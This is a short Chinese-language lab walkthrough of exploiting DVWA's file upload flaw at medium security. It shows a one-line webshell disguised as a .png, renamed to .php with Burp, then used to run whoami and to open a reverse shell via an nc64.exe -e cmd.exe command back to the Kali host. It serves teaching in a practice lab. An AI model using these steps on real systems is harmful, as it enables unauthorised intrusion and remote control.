本节讲述了DVWA的文件上传漏洞,演示利用文件上传入侵靶机。
目录
1.场景
虚拟机:vmware
攻击主机:kali
IP:192.168.239.142
靶机:Windows10
IP:192.168.239.1
服务:xampp启动的DVWA
2.DVWA 文件上传漏洞简介
文件上传漏洞界面是一处图片上传,
这次我们使用medium安全级别(因为low级别的实在是太简单),代码如下,
代码审计后,发现只能上传格式为jpeg和png类型图片,且size不能大于10000。
3.DVWA 文件上传漏洞利用
准备一个一句话木马文件,后缀为.png。
上传文件,并使用burp截获,
使用burp把文件shell.png改为shell.php,
上传成功,并且界面还显示了上传路径。
浏览器输入http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=whoami测试上传的一句话木马。命令执行成功,显示了靶机主机名。
在kali上开启nc,浏览器执行URL
http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=nc64.exe -e cmd.exe 192.168.239.142 4444
获取靶机的shell。
4.总结
文件上传漏洞的利用需要注意的是,必须知道上传后的路径。如果上传一个木马后无法获得路径,那么也不可能触发从而进行利用。